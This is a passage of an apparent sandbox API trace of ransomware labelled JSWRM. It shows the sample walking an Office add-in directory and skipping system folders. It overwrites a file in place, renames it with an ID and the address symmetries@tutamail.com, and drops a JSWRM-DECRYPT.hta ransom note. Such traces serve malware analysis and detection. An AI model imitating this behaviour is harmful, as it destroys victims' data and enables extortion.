[0125.256] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.256] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0125.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0125.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0125.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0125.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0125.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.256] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0e95c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0e95c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc21a8ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.256] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0125.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0125.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.257] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefe00baf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.257] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0125.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0125.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0125.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.258] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15d14b21, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x530d1, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ru.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2=".") returned 1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="..") returned 1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="...") returned 1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="windows") returned -1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="recovery") returned -1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="perflogs") returned 1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="documents and settings") returned 1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="system volume information") returned -1 [0125.258] lstrcmpiW (lpString1="PowerViewRes.ru.xap", lpString2="msocache") returned 1 [0125.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ru.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0125.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ru.xap", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ru.xap", lpUsedDefaultChar=0x0) returned 19 [0125.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ru.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ru.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ru.xap", lpUsedDefaultChar=0x0) returned 19 [0125.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0125.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\PowerViewRes.ru.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ru\\powerviewres.ru.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.259] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=340177) returned 1 [0125.259] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.260] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.277] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.277] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.277] CloseHandle (hObject=0x338) returned 1 [0125.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0125.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0125.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0125.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0125.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.278] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\PowerViewRes.ru.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ru\\powerviewres.ru.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ru\\PowerViewRes.ru.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ru\\powerviewres.ru.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0125.279] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15d14b21, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x530d1, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ru.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.279] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0125.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0125.279] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e92299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2=".") returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="..") returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="...") returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="windows") returned -1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="recovery") returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="perflogs") returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="documents and settings") returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="$RECYCLE.BIN") returned 1 [0125.279] lstrcmpiW (lpString1="sk", lpString2="system volume information") returned -1 [0125.280] lstrcmpiW (lpString1="sk", lpString2="msocache") returned 1 [0125.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0125.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0125.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0125.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0125.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0125.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sk\\jswrm-decrypt.hta")) returned 0xffffffff [0125.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0125.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0125.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0125.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0125.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.282] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.282] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.283] CloseHandle (hObject=0x314) returned 1 [0125.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0125.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0125.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0125.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0125.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) 